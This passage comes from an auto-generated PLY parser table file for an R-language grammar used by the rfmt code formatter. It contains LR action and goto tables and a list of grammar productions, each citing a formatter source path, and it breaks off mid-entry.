-60, -62, -64, -61]), ']': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 56, 66, 71, 72, 78, 80, 81, 82, 83, 84, 85, 86, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 123, 124, 125, 126, 127, 128, 129, 136, 137, 138, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, -2, -19, -18, -17, -21, -63, -49, -49, -20, -48, -58, -25, -33, -49, -14, -15, -53, -50, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, 128, -37, -46, -39, -23, -24, -43, -45, -47, -32, 129, -31, -34, -51, -56, -54, -49, -16, 139, -71, -57, -55, -52, -72, -65, -60, -62, -64, -61]), '^': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 67, 67, 67, 67, 67, -63, 67, -48, 67, -58, 67, -25, 67, -14, -15, 67, 67, 67, 67, 67, 67, 67, 67, 67, -26, 67, 67, 67, -3, 67, 67, 67, 67, -23, -24, 67, 67, 67, 67, 67, 67, -16, -71, 67, 67, 67, 67, -72, -65, -60, -62, -64, -61]), 'COMMENT': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]), 'FOR': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12]), 'LBRACE': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]), 'NS_GET_INT': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 61, 61, 61, 61, 61, -63, 61, -48, 61, -58, 61, 61, 61, -14, -15, 61, 61, 61, 61, 61, 61, 61, 61, 61, 61, 61, 61, 61, -3, 61, 61, 61, 61, -23, -24, 61, 61, 61, 61, 61, 61, -16, -71, 61, 61, 61, 61, -72, -65, -60, -62, -64, -61]), '$end': ([1, 2, 7, 9, 10, 11, 16, 17, 19, 20, 22, 23, 24, 26, 28, 29, 30, 31, 32, 37, 69, 70, 71, 72, 78, 80, 81, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 115, 116, 127, 129, 139, 141, 142, 143, 146, 147], [-4, 0, -4, -12, -10, -4, -11, -13, -14, -15, -2, -5, -1, -19, -18, -17, -7, -21, -6, -63, -4, -4, -20, -48, -58, -25, -33, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -9, -8, -16, -71, -72, -65, -60, -62, -64, -61]), 'STR_CONST': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 83, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 83, 19, 19, 19, 19, 19, 19, 19, 19, 19, 83, 19, 19, 19, 19, 83, 19, 19, 19, 19, 83, 19, 19, 19, 19, 19]), 'BEGIN': ([0], [1]), 'RIGHT_ASSIGN': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 64, -19, -18, -17, 64, -63, -20, -48, 64, -58, 64, -25, 64, -14, -15, 64, -29, -27, -28, -30, -22, -36, -41, 64, -26, -42, 64, -38, -3, -40, -37, 64, -39, -23, -24, -43, 64, -47, -32, -31, -34, -16, -71, 64, 64, 64, 64, -72, -65, -60, -62, -64, -61]), 'RBRACE': ([7, 9, 10, 11, 15, 16, 17, 19, 20, 22, 23, 26, 28, 29, 30, 31, 32, 36, 37, 69, 70, 71, 72, 78, 80, 81, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 115, 116, 127, 129, 139, 141, 142, 143, 146, 147], [-4, -12, -10, -4, -4, -11, -13, -14, -15, -2, -5, -19, -18, -17, -7, -21, -6, 78, -63, -4, -4, -20, -48, -58, -25, -33, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -9, -8, -16, -71, -72, -65, -60, -62, -64, -61]), '~': ([1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 22, 25, 26, 28, 29, 31, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 77, 78, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 117, 118, 124, 125, 126, 127, 129, 130, 131, 133, 134, 135, 136, 137, 139, 141, 142, 143, 144, 145, 146, 147], [25, 25, 25, 25, 25, 25, 25, -12, -10, 25, 25, -11, -13, 25, -14, -15, 68, 25, -19, -18, -17, 68, 25, -63, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, 25, -20, -48, 68, -58, 68, -25, 68, 25, -14, -15, 68, -29, -27, -28, -30, -22, -36, -41, 68, -26, -42, 68, -38, -3, -40, -37, 68, -39, -23, -24, -43, 68, 68, -32, -31, -34, 25, 25, 25, 25, 25, -16, -71, 68, 68, 25, 25, 25, 68, 68, -72, -65, -60, -62, 25, 25, -64, -61]), 'AND2': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 52, -19, -18, -17, -21, -63, -20, -48, 52, -58, 52, -25, 52, -14, -15, 52, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, 52, -38, -3, -40, -37, -46, -39, -23, -24, -43, 52, -47, -32, -31, -34, -16, -71, 52, 52, 52, 52, -72, -65, -60, -62, -64, -61]), 'SPECIAL': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 65, 65, -18, -17, 65, -63, 65, -48, 65, -58, 65, -25, 65, -14, -15, 65, 65, 65, 65, 65, -22, 65, 65, 65, -26, 65, 65, 65, -3, 65, 65, 65, 65, -23, -24, 65, 65, 65, -32, -31, 65, -16, -71, 65, 65, 65, 65, -72, -65, -60, -62, -64, -61]), 'NS_GET': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 60, 60, 60, 60, 60, -63, 60, -48, 60, -58, 60, 60, 60, -14, -15, 60, 60, 60, 60, 60, 60, 60, 60, 60, 60, 60, 60, 60, -3, 60, 60, 60, 60, -23, -24, 60, 60, 60, 60, 60, 60, -16, -71, 60, 60, 60, 60, -72, -65, -60, -62, -64, -61]), 'REPEAT': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18, 18])} _lr_action = {} for (_k, _v) in _lr_action_items.items(): for (_x, _y) in zip(_v[0], _v[1]): if not _x in _lr_action: _lr_action[_x] = {} _lr_action[_x][_k] = _y del _lr_action_items _lr_goto_items = {'prog': ([0], [2]), 'expr': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [22, 26, 22, 28, 29, 22, 31, 22, 22, 22, 71, 77, 79, 80, 81, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 22, 101, 85, 103, 104, 105, 106, 107, 108, 109, 110, 111, 85, 113, 114, 22, 22, 85, 130, 131, 136, 137, 85, 22, 22, 22, 22, 22]), 'eatlines': ([76, 77, 79, 130], [120, 121, 122, 140]), 'sublist': ([41, 56, 66, 82, 126], [87, 102, 112, 123, 138]), 'form': ([34, 119], [75, 75]), 'expr_or_assign': ([1, 4, 7, 11, 15, 18, 54, 69, 70, 133, 134, 135, 144, 145], [23, 27, 23, 23, 23, 37, 100, 23, 23, 141, 142, 143, 146, 147]), 'formlist': ([34, 119], [76, 132]), 'exprlist': ([1, 7, 11, 15, 69, 70], [24, 30, 32, 36, 115, 116]), 'sub': ([41, 56, 66, 82, 126], [86, 86, 86, 86, 86])} _lr_goto = {} for (_k, _v) in _lr_goto_items.items(): for (_x, _y) in zip(_v[0], _v[1]): if not _x in _lr_goto: _lr_goto[_x] = {} _lr_goto[_x][_k] = _y del _lr_goto_items _lr_productions = [("S' -> prog", "S'", 1, None, None, None), ('prog -> BEGIN exprlist', 'prog', 2, 'p_prog', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 783), ('expr_or_assign -> expr', 'expr_or_assign', 1, 'p_expr_or_assign', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 789), ('expr_or_assign -> expr EQ_ASSIGN expr_or_assign', 'expr_or_assign', 3, 'p_expr_or_assign', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 790), ('exprlist -> <empty>', 'exprlist', 0, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 799), ('exprlist -> expr_or_assign', 'exprlist', 1, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 800), ('exprlist -> CR exprlist', 'exprlist', 2, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 801), ('exprlist -> ; exprlist', 'exprlist', 2, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 802), ('exprlist -> expr_or_assign CR exprlist', 'exprlist', 3, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 803), ('exprlist -> expr_or_assign ; exprlist', 'exprlist', 3, 'p_exprlist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 804), ('expr -> COMMENT', 'expr', 1, 'p_expr_comment', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 825), ('expr -> NEXT', 'expr', 1, 'p_expr_atom', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 831), ('expr -> BREAK', 'expr', 1, 'p_expr_atom', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 832), ('expr -> NUM_CONST', 'expr', 1, 'p_expr_atom', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 833), ('expr -> STR_CONST', 'expr', 1, 'p_expr_atom', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 834), ('expr -> SYMBOL', 'expr', 1, 'p_expr_atom', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 835), ('expr -> expr ( sublist )', 'expr', 4, 'p_expr_function_call', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 841), ('expr -> - expr', 'expr', 2, 'p_expr_unop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 847), ('expr -> + expr', 'expr', 2, 'p_expr_unop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 848), ('expr -> ! expr', 'expr', 2, 'p_expr_unop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 849), ('expr -> ~ expr', 'expr', 2, 'p_expr_unop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 850), ('expr -> ? expr', 'expr', 2, 'p_expr_unop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 851), ('expr -> expr : expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 857), ('expr -> expr NS_GET expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 858), ('expr -> expr NS_GET_INT expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 859), ('expr -> expr $ expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 860), ('expr -> expr @ expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 861), ('expr -> expr + expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 862), ('expr -> expr - expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 863), ('expr -> expr * expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 864), ('expr -> expr / expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 865), ('expr -> expr ^ expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 866), ('expr -> expr SPECIAL expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 867), ('expr -> expr % expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 868), ('expr -> expr ~ expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 869), ('expr -> expr ? expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 870), ('expr -> expr < expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 871), ('expr -> expr LE expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 872), ('expr -> expr EQ expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 873), ('expr -> expr NE expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 874), ('expr -> expr GE expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 875), ('expr -> expr > expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 876), ('expr -> expr AND expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 877), ('expr -> expr OR expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 878), ('expr -> expr AND2 expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 879), ('expr -> expr OR2 expr', 'expr', 3, 'p_expr_binop', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 880), ('expr -> expr LEFT_ASSIGN expr', 'expr', 3, 'p_expr_assign', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 886), ('expr -> expr RIGHT_ASSIGN expr', 'expr', 3, 'p_expr_assign', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 887), ('expr -> ( expr_or_assign )', 'expr', 3, 'p_expr_paren', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 893), ('sublist -> <empty>', 'sublist', 0, 'p_sublist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 899), ('sublist -> sub', 'sublist', 1, 'p_sublist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 900), ('sublist -> , sublist', 'sublist', 2, 'p_sublist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 901), ('sublist -> sub , sublist', 'sublist', 3, 'p_sublist', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 902), ('sub -> expr', 'sub', 1, 'p_sub', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 915), ('sub -> SYMBOL EQ_ASSIGN', 'sub', 2, 'p_sub', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 916), ('sub -> SYMBOL EQ_ASSIGN expr', 'sub', 3, 'p_sub', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 917), ('sub -> STR_CONST EQ_ASSIGN', 'sub', 2, 'p_sub', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 918), ('sub -> STR_CONST EQ_ASSIGN expr', 'sub', 3, 'p_sub', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 919), ('expr -> LBRACE exprlist RBRACE', 'expr', 3, 'p_expr_braced_block', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 928), ('eatlines -> <empty>', 'eatlines', 0, 'p_eatlines', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 934), ('expr -> IF ( expr eatlines ) expr_or_assign', 'expr', 6, 'p_expr_if_expr', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 940), ('expr -> IF ( expr eatlines ) expr_or_assign ELSE expr_or_assign', 'expr', 8, 'p_expr_if_else', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 946), ('expr -> WHILE ( expr eatlines ) expr_or_assign', 'expr', 6, 'p_expr_while', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 953), ('expr -> REPEAT expr_or_assign', 'expr', 2, 'p_expr_repeat', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 959), ('expr -> FOR ( SYMBOL IN expr eatlines ) expr_or_assign', 'expr', 8, 'p_expr_for_expr', '/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py', 965), ('expr -> FUNCTION ( formlist eatlines ) expr_or_assign', 'expr', 6, 'p_expr_function', 